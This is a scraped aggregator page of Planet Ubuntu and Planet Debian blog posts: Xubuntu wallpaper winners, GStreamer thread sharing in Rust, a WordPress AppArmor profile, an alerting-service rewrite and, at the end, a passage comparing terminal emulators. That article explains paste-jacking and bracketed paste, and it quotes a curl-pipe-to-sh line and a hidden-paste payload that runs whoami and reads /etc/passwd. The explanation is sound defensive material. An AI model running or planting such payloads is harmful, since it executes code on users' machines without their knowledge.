You are here

Agreguesi i feed

Xubuntu: Xubuntu 18.04 Community Wallpaper Contest Winners!

Planet Ubuntu - Pre, 06/04/2018 - 12:36pd

The Xubuntu team are happy to announce the results of the 18.04 community wallpaper contest!

We want to send out a huge thanks to every contestant; last time we had 92 submissions but now you all made us work much harder in picking the best ones out with a total of 162 submissions! Great work! All of the submissions are browsable on the 18.04 contest page at contest.xubuntu.org.

Without further ado, here are the winners:

Note that the images listed above are resized for the website. For the full size images (up to 4K resolution!), make sure you have the package xubuntu-community-wallpapers installed. The package is installed by default in all new Xubuntu 18.04 installations.

Sebastian Dröge: Improving GStreamer performance on a high number of network streams by sharing threads between elements with Rust’s tokio crate

Planet Ubuntu - Enj, 05/04/2018 - 5:21md

For one of our customers at Centricular we were working on a quite interesting project. Their use-case was basically to receive an as-high-as-possible number of audio RTP streams over UDP, transcode them, and then send them out via UDP again. Due to how GStreamer usually works, they were running into some performance issues.

This blog post will describe the first set of improvements that were implemented for this use-case, together with a minimal benchmark and the results. My colleague Mathieu will follow up with one or two other blog posts with the other improvements and a more full-featured benchmark.

The short version is that CPU usage decreased by about 65-75%, i.e. allowing 3-4x more streams with the same CPU usage. Also parallelization works better and usage of different CPU cores is more controllable, allowing for better scalability. And a fixed, but configurable number of threads is used, which is independent of the number of streams.

The code for this blog post can be found here.

Table of Contents
  1. GStreamer & Threads
  2. Thread-Sharing GStreamer Elements
  3. Available Elements
  4. Little Benchmark
  5. Conclusion
GStreamer & Threads

In GStreamer, by default each source is running from its own OS thread. Additionally, for receiving/sending RTP, there will be another thread in the RTP jitterbuffer, yet another thread for receiving RTCP (another source) and a last thread for sending RTCP at the right times. And RTCP has to be received and sent for the receiver and sender side part of the pipeline, so the number of threads doubles. In the sum this gives at least 1 + 1 + (1 + 1) * 2 = 6 threads per RTP stream in this scenario. In a normal audio scenario, there will be one packet received/sent e.g. every 20ms on each stream, and every now and then an RTCP packet. So most of the time all these threads are only waiting.

Apart from the obvious waste of OS resources (1000 streams would be 6000 threads), this also brings down performance as all the time threads are being woken up. This means that context switches have to happen basically all the time.

To solve this we implemented a mechanism to share threads, and in the end as a result we have a fixed, but configurable number of threads that is independent from the number of streams. And can run e.g. 500 streams just fine on a single thread with a single core, which was completely impossible before. In addition we also did some work to reduce the number of allocations for each packet, so that after startup no additional allocations happen per packet anymore for buffers. See Mathieu’s upcoming blog post for details.

In this blog post, I’m going to write about a generic mechanism for sources, queues and similar elements to share their threads between each other. For the RTP related bits (RTP jitterbuffer and RTCP timer) this was not used due to reuse of existing C codebases.

Thread-Sharing GStreamer Elements

The code in question can be found here, a small benchmark is in the examples directory and it is going to be used for the results later. A full-featured benchmark will come in Mathieu’s blog post.

This is a new GStreamer plugin, written in Rust and around the Tokio crate for asynchronous IO and generally a “task scheduler”.

While this could certainly also have been written in C around something like libuv, doing this kind of work in Rust is simply more productive and fun due to its safety guarantees and the strong type system, which definitely reduced the amount of debugging a lot. And in addition “modern” language features like closures, which make working with futures much more ergonomic.

When using these elements it is important to have full control over the pipeline and its elements, and the dataflow inside the pipeline has to be carefully considered to properly configure how to share threads. For example the following two restrictions should be kept in mind all the time:

  1. Downstream of such an element, the streaming thread must never ever block for considerable amounts of time. Otherwise all other elements inside the same thread-group would be blocked too, even if they could do any work now
  2. This generally all works better in live pipelines, where media is produced in real-time and not as fast as possible
Available Elements

So this repository currently contains the generic infrastructure (see the src/iocontext.rs source file) and a couple of elements:

  • an UDP source: ts-udpsrc, a replacement for udpsrc
  • an app source: ts-appsrc, a replacement for appsrc to inject packets into the pipeline from the application
  • a queue: ts-queue, a replacement for queue that is useful for adding buffering to a pipeline part. The upstream side of the queue will block if not called from another thread-sharing element, but if called from another thread-sharing element it will pause the current task asynchronously. That is, stop the upstream task from producing more data.
  • a proxysink/src element: ts-proxysrc, ts-proxysink, replacements for proxysink/proxysrc for connecting two pipelines with each other. This basically works like the queue, but split into two elements.
  • a tone generator source around spandsp: ts-tonesrc, a replacement for tonegeneratesrc. This also contains some minimal FFI bindings for that part of the spandsp C library.

All these elements have more or less the same API as their non-thread-sharing counterparts.

API-wise, each of these elements has a set of properties for controlling how it is sharing threads with other elements, and with which elements:

  • context: A string that defines in which group this element is. All elements with the same context are running on the same thread or group of threads,
  • context-threads: Number of threads to use in this context. -1 means exactly one thread, 1 and above used N+1 threads (1 thread for polling fds, N worker threads) and 0 sets N to the number of available CPU cores. As long as no considerable work is done in these threads, -1 has shown to be the most efficient. See also this tokio GitHub issue
  • context-wait: Number of milliseconds that the threads will wait on each iteration. This allows to reduce CPU usage even further by handling all events/packets that arrived during that timespan to be handled all at once instead of waking up the thread every time a little event happens, thus reducing context switches again

The elements are all pushing data downstream from a tokio thread whenever data is available, assuming that downstream does not block. If downstream is another thread-sharing element and it would have to block (e.g. a full queue), it instead returns a new future to upstream so that upstream can asynchronously wait on that future before producing more output. By this, back-pressure is implemented between different GStreamer elements without ever blocking any of the tokio threads. All this is implemented around the normal GStreamer data-flow mechanisms, there is no “tokio fast-path” between elements.

Little Benchmark

As mentioned above, there’s a small benchmark application in the examples directory. This basically sets up a configurable number of streams and directly connects them to a fakesink, throwing away all packets. Additionally there is another thread that is sending all these packets. As such, this is really the most basic benchmark and not very realistic but nonetheless it shows the same performance improvement as the real application. Again, see Mathieu’s upcoming blog post for a more realistic and complete benchmark.

When running it, make sure that your user can create enough fds. The benchmark will just abort if not enough fds can be allocated. You can control this with ulimit -n SOME_NUMBER, and allowing a couple of thousands is generally a good idea. The benchmarks below were running with 10000.

After running cargo build –release to build the plugin itself, you can run the benchmark with:

cargo run --release --example udpsrc-benchmark -- 1000 ts-udpsrc -1 1 20

and in another shell the UDP sender with

cargo run --release --example udpsrc-benchmark-sender -- 1000

This runs 1000 streams, uses ts-udpsrc (alternative would be udpsrc), configures exactly one thread -1, 1 context, and a wait time of 20ms. See above for what these settings mean. You can check CPU usage with e.g. top. Testing was done on an Intel i7-4790K, with Rust 1.25 and GStreamer 1.14. One packet is sent every 20ms for each stream.

Source Streams Threads Contexts Wait CPU udpsrc 1000 1000 x x 44% ts-udpsrc 1000 -1 1 0 18% ts-udpsrc 1000 -1 1 20 13% ts-udpsrc 1000 -1 2 20 15% ts-udpsrc 1000 2 1 20 16% ts-udpsrc 1000 2 2 20 27% Source Streams Threads Contexts Wait CPU udpsrc 2000 2000 x x 95% ts-udpsrc 2000 -1 1 20 29% ts-udpsrc 2000 -1 2 20 31% Source Streams Threads Contexts Wait CPU ts-udpsrc 3000 -1 1 20 36% ts-udpsrc 3000 -1 2 20 47%

Results for 3000 streams for the old udpsrc are not included as starting up that many threads needs too long.

The best configuration is apparently a single thread per context (see this tokio GitHub issue) and waiting 20ms for every iterations. Compared to the old udpsrc, CPU usage is about one third in that setting, and generally it seems to parallelize well. It’s not clear to me why the last test has 11% more CPU with two contexts, while in every other test the number of contexts does not really make a difference, and also not for that many streams in the real test-case.

The waiting does not reduce CPU usage a lot in this benchmark, but on the real test-case it does. The reason is most likely that this benchmark basically sends all packets at once, then waits for the remaining time, then sends the next packets.

Take these numbers with caution, the real test-case in Mathieu’s blog post will show the improvements in the bigger picture, where it was generally a quarter of CPU usage and almost perfect parallelization when increasing the number of contexts.

Conclusion

Generally this was a fun exercise and we’re quite happy with the results, especially the real results. It took me some time to understand how tokio works internally so that I can implement all kinds of customizations on top of it, but for normal usage of tokio that should not be required and the overall design makes a lot of sense to me, as well as the way how futures are implemented in Rust. It requires some learning and understanding how exactly the API can be used and behaves, but once that point is reached it seems like a very productive and performant solution for asynchronous IO. And modelling asynchronous IO problems based on the Rust-style futures seems a nice and intuitive fit.

The performance measurements also showed that GStreamer’s default usage of threads is not always optimal, and a model like in upipe or pipewire (or rather SPA) can provide better performance. But as this also shows, it is possible to implement something like this on top of GStreamer and for the common case, using threads like in GStreamer reduces the cognitive load on the developer a lot.

For a future version of GStreamer, I don’t think we should make the threading “manual” like in these two other projects, but instead provide some API additions that make it nicer to implement thread-sharing elements and to add ways in the GStreamer core to make streaming threads non-blocking. All this can be implemented already, but it could be nicer.

All this “only” improved the number of threads, and thus the threading and context switching overhead. Many other optimizations in other areas are still possible on top of this, for example optimizing receive performance and reducing the number of memory copies inside the pipeline even further. If that’s something you would be interested in, feel free to get in touch.

And with that: Read Mathieu’s upcoming blog posts about the other parts, RTP jitterbuffer / RTCP timer thread sharing, and no allocations, and the full benchmark.

Dustin Kirkland: I'm Joining the Google Cloud Team!

Planet Ubuntu - Enj, 05/04/2018 - 1:48pd

A couple of months ago, I reflected on "10 Amazing Years of Ubuntu and Canonical".  Indeed, it has been one hell of a ride, and that post is merely the tip of the proverbial iceberg...

The people I've met, the things I've learned, the places I've been, the users I've helped, the partners I've enabled, the customers I've served -- these are undoubtedly the most amazing and cherished experiences of my professional career to date.

And for the first time in my life, I can fully and completely grok the Ubuntu philosophy:
I am who I am, because of who we all areWith all my heart, I love what we've created in Ubuntu, I love the products that we've built at Canonical, I love each and every person involved.

So, it is with mixed emotion that the Canonical chapter of my life comes to a close and a new one begins...

Next week, I have the honor and privilege to join the Google Cloud product management team, and work beside so, so, so, so many people who continue to inspire me.

Words fail to express how excited I am about this opportunity!  In this new role, I will be working closely with Aparna Sinha, Michael Rubin, and Tim Hockin, and I hope to see many of you at KubeCon Europe in Copenhagen later this month.

My friends and family will be happy to know that we're staying here in Austin, and I'll be working from the Google Austin office with my new team, largely based in Sunnyvale, California.

The Ubuntu community can expect to see me remaining active in the Ubuntu developer community as a Core Dev and a MOTU, and I will continue to maintain many of the dozens of open source projects and packages that so many of you have come to rely upon.  Perhaps I'll even become more active upstream in Debian, if the Debian community will have me there too :-)

Finally, an enormous THANK YOU to everyone who has made this journey through Ubuntu and Canonical such a warm, rewarding, emotional, exceptional experience!

Cheers,
@DustinKirkland

Raphaël Hertzog: My Free Software Activities in March 2018

Planet Ubuntu - Mër, 04/04/2018 - 12:22md

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Distro Tracker

I reviewed and merged 14 merge requests from multiple contributors:

On top of this, I updated the Salsa/AliothMigration wiki page with information about how to best leverage tracker.debian.org when you migrate to salsa.

I also filed a few issues for bugs or things that I’d like to see improved:

I also gave my feedback about multiple mockups prepared by Chirath R in preparation of his Google Summer of Code project proposal.

Security Tools Packaging Team

Following the departure of alioth, the new list that we requested on lists.debian.org has been created: https://lists.debian.org/debian-security-tools/

I updated (in the git repositories) all the Vcs-* and all the Maintainer fields of the packages maintained by the team.

I prepared and uploaded afflib 3.7.16-3 to fix RC bug #892599. I sponsored rhash 1.3.6 for Aleksey Kravchenko, ccrypt 1.10-5 for Alexander Kulak and ledger-wallets-udev 0.1 for Stephne Neveu.

Debian Live

This project also saw an unexpected resurgence of activity and I had to review and merge many merge requests:

It’s nice to see two derivatives being so active in upstreaming their changes.

Misc stuff

Hamster time tracker. I was regularly hit a by a bug leading to a gnome-shell crash (leading to a graphical session crash due to the design of wayland) and this time I decided that enough was enough so I started to dig in the code and did my best to fix the issues I encountered. During the month, I tested multiple versions and submitted three pull requests. Right now, the version in git is working fine for me. Still, it really smells of a bad design that mistakes in shell extensions can have such dramatic consequences.

Packaging. I forwarded #892063 to upstream in a new ticket. I updated zim to version 0.68 (final release replacing release candidate that I had already packaged). I filed #893083 suggesting that the hello source package should be a model for other packages and as such it should have a git repository hosted on salsa.debian.org.

Sponsorship. I sponsored pylint-django 0.9.4-1 for Joseph Herlant. I also sponsored urwid 2.0.1-1 (new upstream version), xlwt 1.3.0-1 (new version with python 3 support), elastalert 0.1.29-1 (new upstream release and RC bug fix) which have been updated for Freexian customers.

Thanks

See you next month for a new summary of my activities.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

Securing WordPress with AppArmor

Planet Debian - Sht, 31/03/2018 - 12:24md

WordPress is a very popular CMS. According to one report, 30% of websites use WordPress, which is an impressive feat.

Despite this popularity, WordPress is built upon PHP which is often lacking in the security department. Add to this that the user that runs the webserver often has a fair bit of access and there is no distinguishing between the webserver code and the WordPress code and you set yourself up for troubles.

So, let’s introduce something that not only can tell the difference between Apache running and WordPress running under it, but also limit what WordPress can access.

As the AppArmor wiki says “AppArmor is Mandatory Access Control (MAC) like security system for Linux. AppArmor confines individual programs to a set of files, capabilities, network access and rlimits…”.  AppArmor also has this concept of hats, so your webserver code (e.g. apache) can be one hat with one policy but the WordPress PHP code has another hat and therefore another policy. For some reason, AppArmor calls a policy a profile, so wherever you see profile translate that to policy.

The idea here is to limit what WordPress can access down to the files and directories it needs, and nothing more. What follows is how I have setup my system but you may need to tweak it, especially for some plugins.

Change your hat

By default, apache will run in its own  AppArmor profile, called something like the “/usr/sbin/apache2” profile.  As the authors of this profile do not know what you will run on the webserver, it is very permissive and with the standard AppArmor setup is what the WordPress code will also run under.

First, you need to enable and install the mod_apparmor Apache module. This module allows you to change what profile is used, depending on what directory or URL is being requested. The link for mod_apparmor describes how to do this.

Once you have the module enabled, you need to tell Apache what directories you want the hat or profile to be changed and the name of the new hat. I put this into /etc/apache2/conf-available/wordpress and then “a2enconf wordpress”

<Directory "/usr/share/wordpress"> Require all granted <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> <IfModule mod_apparmor.c> AAHatName wordpress </IfModule> </Directory> Alias /wp-content /var/lib/wordpress/wp-content/ <Directory /var/lib/wordpress > Require all granted <IfModule mod_apparmor.c> AAHatName wordpress </IfModule> </Directory>

Most of this configuration is pretty standard WordPress setup for Apache. The important differences are the AAHatName lines.

What we have done here is if Apache serves up files from /usr/share/wordpress (where the WordPress code lives) or /var/lib/wordpress/wp-content (where things like plugins, themes and uploaded images live) then it will use the wordpress sub-profile.

Defining the profile

Now that we have the right profile for our WordPress directories, we need to create a profile. This will tell AppArmor what files and directories WordPress is allowed to access and how they are accessed. Obvious ones are the directories where the code and content live, but you will also need to include the log file locations.

This definition needs to sit “inside” the apache proper profile. In Debian and most other systems, it is just a matter of making a file in /etc/apparmor.d/apache.d/ directory.

^wordpress { include <abstractions/apache2-common> include <abstractions/base> include <abstractions/nameservice> include <abstractions/php5> /var/log/apache2/*.log w, /etc/wordpress/config-*.php r, /usr/share/wordpress/** r, /usr/share/wordpress/.maintenance w, # Change "/var/lib/wordpress/wp-content" to whatever you set # WP_CONTENT_DIR in the # /etc/wordpress/config-*.php file /var/lib/wordpress/wp-content r, /var/lib/wordpress/wp-content/** r, /var/lib/wordpress/wp-content/uploads/** rw, /var/lib/wordpress/wp-content/upgrade/** rw, # Uncomment to permit plugins Install/Update via web /var/lib/wordpress/wp-content/plugins/** rw, # Uncomment to permit themes Install/Update via web #/var/lib/wordpress/wp-content/themes/** rw, # This is what PHP sys_get_temp_dir() returns /tmp/* rw,

What we have here is a policy that basically says you can read the WordPress code and read the WordPress content. The plugins and themes sub-directories can their own line because you can selectively permit write access if you want to update plugins and themes using the web GUI.

The /etc file glob is where the Debian package stores its configuration file. The surprise for me was the maintenance dot-file which is created when WordPress is updating some component. Without this write permission, it is unable to update plugins or do many other things.

Audit Log

So how do you know its working? The simplest way is to apply the policy and then see what appears in your auditd log (Mine is at /var/log/audit/audit.log).

Two main things will go wrong. The first is the wrong profile will get used. I had this problem when I forgot to add the WordPress content directory.

Wrong Profile

type=AVC msg=audit(1522235033.386:43401): apparmor=”ALLOWED” operation=”open” profile=”/usr/sbin/apache2//null-dropbear.xyz” name=”/var/lib/wordpress/wp-content/plugins/akismet/akismet.php” pid=5036 comm=”apache2″ requested_mask=”r” denied_mask=”r” fsuid=33 ouid=33

So, what is AppArmor trying to say here? First we have the wrong profile! It’s not wordpress, but “/usr/sbin/apache2//null-dropbear,xyz” which is basically saying there was no specific sub-profile for this website so we will use the apache2 profile.

The apache2 profile is in complain, not enforce mode, so that’s why it says apparmor=”ALLOWED” yet has denied_mask=”r”.

Adding that second <Directory> clause to use the wordpress AAHatName fixed this.

Profile missing entries

The second type of problem is that you have Apache switching to the correct profile but you missed a line in the profile.  Initially I didn’t know WordPress created a file in the top-level of its code directory when undergoing maintenance. The log file showed:

type=AVC msg=audit(1522318023.409:51143): apparmor=”DENIED” operation=”mknod” profile=”/usr/sbin/apache2//wordpress” name=”/usr/share/wordpress/.maintenance” pid=16165 comm=”apache2″ requested_mask=”c” denied_mask=”c” fsuid=33 ouid=33

We have the correct profile here (wordpress is always sub-profile of apache). But we are getting a DENIED message because the profile (initially) didn’t permit the file /usr/share/wordpress/.maintenance” to be created.

Adding that file to the profile and reloading the profile and Apache fixed this.

Additional Tweaks

The given profile will probably work for most WordPress installations. Make sure you change the code and content directories to wherever you use.  Also, this profile will not let you auto-update the WordPress code. For a Debian package, this is a good thing as the Apache process is not writing the new files, dpkg is and it runs as root. If you are happy for a webserver to update PHP code that runs under it, you can change the permission for read/write for /usr/share/wordpress

I imagine some plugins out there will need additional directories. I don’t use many and none I use do those odd things, but there are plenty of odd plugins out there. Check your audit logs for any DENIED lines.

Craig http://dropbear.xyz Small Dropbear

three conferences one week

Planet Debian - Sht, 31/03/2018 - 3:52pd

Thought I'd pack my entire year's conference schedule into one week...

First was a Neuroinformatics infrastructure interoperability workshop at McGill, my second trip to Montreal this year. Well outside my wheelhouse, but there's a fair amount of interest in that community in git-annex/datalad. This was a roll with the acronyms, and try to draw parallels to things I know affair. Also excellent sushi and a bonus Secure Scuttlebutt meetup.

Then LibrePlanet. A unique and super special conference, that utterly flew by this year. This is my sixth LibrePlanet and I enjoy it more each time. Hghlights for me were Bassam's photogrammetry workshop, Karen receiving the Free Software award, and Seth's thought-provoking talk on "incompossibilities" especially as applied to social networks. And some epic dinner conversations in central square.

Finally today, a one-day local(!) functional programming(!!) conference in Knoxville TN. Lambda Squared was the best constructed single-track conference I've seen. Starting with an ex-pro-figure skater getting the whole audience to pirouette to capture that uncomfortable out of your element feeling you get learning FP, and ramping gradually past "functional javascript" to orthagonality, contravariant functors, the lambda cube, and constructivist logic.

I notice that I've spent a lot more time in Boston than I ever have in Knoxville -- Cambridge MA is starting to feel like my old haunts, though I've never really lived there. There are not a lot of functional programming conferences in the southeastern USA, and I think this explains how Lambda Squared attracted such a good lineup of speakers. Also Knoxville has a surprisingly large and lively FP community shaping up. There will be another Lambda Squared next year, and this might be a good opportunity to visit with me and go to a FP conference too.

And now time to retreat into my retreaty place for a good long while.

Joey Hess http://joeyh.name/blog/ see shy jo

Cluster analysis lecture notes

Planet Debian - Pre, 30/03/2018 - 5:33md

In Winter Term 2017/2018 I was substitute professor at Univeristy Heidelberg, and giving the lecture “Knowledge Discovery in Databases”, i.e., the data mining lecture.

While I won’t make all my slides available, I decided to make the chapter on cluster analysis available. Largely, because there do not appear to be good current books on this topic. Many of the books on data mining barely cover the basics. And I am constantly surprised to see how little people know beyond k-means. But clustering is much broader than k-means!

As I hope to give this lecture frequently at some point, I appreciate feedback to further improve them. This year, I almost completely reworked them, so there are a lot of things to fine tune.

There exist three versions of the slides:

These slides took me about 9 sessions of 90 minutes each.
On one hand, I was not very fast this year, and I probably need to cut down on the extra blackboard material, too. Next time, I would try to use at most 8 sessions for this, to be able to cover other important topics such as outlier detection in more detail, that were a bit too short this time.

I hope the slides will be interesting and useful, and I would appreciate if you give me credit, e.g., by citing my work appropriately.

Erich Schubert https://www.vitavonni.de/blog/ Techblogging

My Laptop

Planet Debian - Pre, 30/03/2018 - 10:32pd

My laptop is an old used Samsung R439 that I bought for around Rs 12000/-(USD 185) from a local store when I was in second year in my college. It have a 14” screen, 2GB of RAM, a Pentium p1600 processor, and a 320GB HDD.

Recently it started showing performance issues like loading applications take a while and firefox freezes. I quite fond of this laptop and have some emotional attachment for it. I was reluctant to buy a new one but the same time I need the VT-x (virtualization) feature that my pentium p1600 lacks. So I chose to upgrade it from the ground. The hard part of upgrading is to find a compatible processor for the board. My friend Akhil Varkey whom I met during a Debian packaging session helped me to find a processor that suits my board. I bought the suggested one from Aliexpress, cause I found it cheaply available. I disassembled and installed new processor myself. During disassembling I totally destroyed two screws(stripped) including the holes :(. Now I need to be more careful when carrying laptop around. I already have changed my laptop battery and keyboard couple of months after I bought it. I will be upgrading RAM and hard disk soon.

Abhijith PA http://abhijithpa.me/ Abhijith PA

Rewriting some services in golang

Planet Debian - Pre, 30/03/2018 - 9:00pd

The past couple of days I've been reworking a few of my existing projects, and converting them from Perl into Golang.

Bytemark had a great alerting system for routing alerts to different enginners, via email, SMS, and chat-messages. The system is called mauvealert and is available here on github.

The system is built around the notion of alerts which have different states (such as "pending", "raised", or "acknowledged"). Each alert is submitted via a UDP packet getting sent to the server with a bunch of fields:

  • Source IP of the submitter (this is implicit).
  • A human-readable ID such as "heartbeat", "disk-space-/", "disk-space-/root", etc.
  • A raise-field.
  • More fields here ..

Each incoming submission is stored in a database, and events are considered unique based upon the source+ID pair, such that if you see a second submission from the same IP, with the same ID, then any existing details are updated. This update-on-receive behaviour is pretty crucial to the way things work, especially when coupled with the "raise"-field.

A raise field might have values such as:

  • +5m
    • This alert will be raised in 5 minutes.
  • now
    • This alert will be raised immediately.
  • clear
    • This alert will be cleared immediately.

One simple way the system is used is to maintain heartbeat-alerts. Imagine a system sends the following message, every minute:

  • id:heartbeat raise:+5m [source:1.2.3.4]
    • The first time this is received by the server it will be recorded in the database.
    • The next time this is received the existing event will be updated, and crucially the time to raise an alert will be bumped (i.e. it will become current-time + 5m).
    • The next time the update is received the raise-time will also be bumped
    • ..

At some point the submitting system crashes, and five minutes after the last submission the alert moves from "pending" to "raised" - which will make it visible in the web-based user-interface, and also notify an engineer.

With this system you could easily write trivial and stateless ad-hoc monitoring scripts like so which would raise/clear :

curl https://example.com && send-alert --id http-example.com --raise clear --detail "site ok" || \ send-alert --id http-example.com --raise now --detail "site down"

In short mauvealert allows aggregation of events, and centralises how/when engineers are notified. There's the flexibility to look at events, and send them to different people at different times of the day, decide some are urgent and must trigger SMSs, and some are ignorable and just generate emails .

(In mauvealert this routing is done by having a configuration file containing ruby, this attempts to match events so you could do things like say "If the event-id contains "failed-disc" then notify a DC-person, or if the event was raised from $important-system then notify everybody.)

I thought the design was pretty cool, and wanted something similar for myself. My version, which I setup a couple of years ago, was based around HTTP+JSON, rather than UDP-messages, and written in perl:

The advantage of using HTTP+JSON is that writing clients to submit events to the central system could easily and cheaply be done in multiple environments for multiple platforms. I didn't see the need for the efficiency of using binary UDP-based messages for submission, given that I have ~20 servers at the most.

Anyway the point of this blog post is that I've now rewritten my simplified personal-clone as a golang project, which makes deployment much simpler. Events are stored in an SQLite database and when raised they get sent to me via pushover:

The main difference is that I don't allow you to route events to different people, or notify via different mechanisms. Every raised alert gets sent to me, and only me, regardless of time of day. (Albeit via an pluggable external process such that you could add your own local logic.)

I've written too much already, getting sidetracked by explaining how neat mauvealert and by extension purple was, but also I rewrote the Perl DNS-lookup service at https://dns-api.org/ in golang too:

That had a couple of regressions which were soon reported and fixed by a kind contributor (lack of CORS headers, most obviously).

Steve Kemp https://blog.steve.fi/ Steve Kemp's Blog

Debian Policy call for participation -- March 2018

Planet Debian - Pre, 30/03/2018 - 2:23pd

We’re getting close to a new release of Policy. Just this week Adam Borowski stepped up to get a patch written for #881431 – thanks for getting things moving along!

Please consider jumping into some of these bugs.

Consensus has been reached and help is needed to write a patch

#823256 Update maintscript arguments with dpkg >= 1.18.5

#833401 virtual packages: dbus-session-bus, dbus-default-session-bus

#835451 Building as root should be discouraged

#838777 Policy 11.8.4 for x-window-manager needs update for freedesktop menus

#845715 Please document that packages are not allowed to write outside thei…

#853779 Clarify requirements about update-rc.d and invoke-rc.d usage in mai…

#874019 Note that the ’-e’ argument to x-terminal-emulator works like ’–’

#874206 allow a trailing comma in package relationship fields

Wording proposed, awaiting review from anyone and/or seconds by DDs

#756835 Extension of the syntax of the Packages-List field.

#786470 [copyright-format] Add an optional “License-Grant” field

#835451 Building as root should be discouraged

#845255 Include best practices for packaging database applications

#846970 Proposal for a Build-Indep-Architecture: control file field

#864615 please update version of posix standard for scripts (section 10.4)

#881431 Clarify a version number is unique field

#892142 update example to use default-mta instead of exim

Merged for the next release (no action needed)

#299007 Transitioning perms of /usr/local

#515856 remove get-orig-source

#742364 Document debian/missing-sources

#886890 Fix for found typos

#888437 Several example scripts are not valid.

#889960 stray line break at clean target in section 4.9

#892142 update example to use default-mta instead of exim

Sean Whitton https://spwhitton.name//blog/ Notes from the Library

A look at terminal emulators, part 1

Planet Debian - Pre, 30/03/2018 - 2:00pd

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride at using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal Debian Fedora Upstream Notes Alacritty N/A N/A 6debc4f no releases, Git head GNOME Terminal 3.22.2 3.26.2 3.28.0 uses GTK3, VTE Konsole 16.12.0 17.12.2 17.12.3 uses KDE libraries mlterm 3.5.0 3.7.0 3.8.5 uses VTE, "Multi-lingual terminal" pterm 0.67 0.70 0.70 PuTTY without ssh, uses GTK2 st 0.6 0.7 0.8.1 "simple terminal" Terminator 1.90+bzr-1705 1.91 1.91 uses GTK3, VTE urxvt 9.22 9.22 9.22 main rxvt fork, also known as rxvt-unicode Xfce Terminal 0.8.3 0.8.7 0.8.7.2 uses GTK3, VTE xterm 327 330 331 the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

By default, xterm uses the classic "fixed" font which, according to Wikipedia has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fallback across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command: git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null; clear; echo -n "Hello "; whoami|tr -d '\n'; echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \ Here'"'"'s the first line of your /etc/passwd: '; head -n1 /etc/passwd git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.

Tabs and profiles

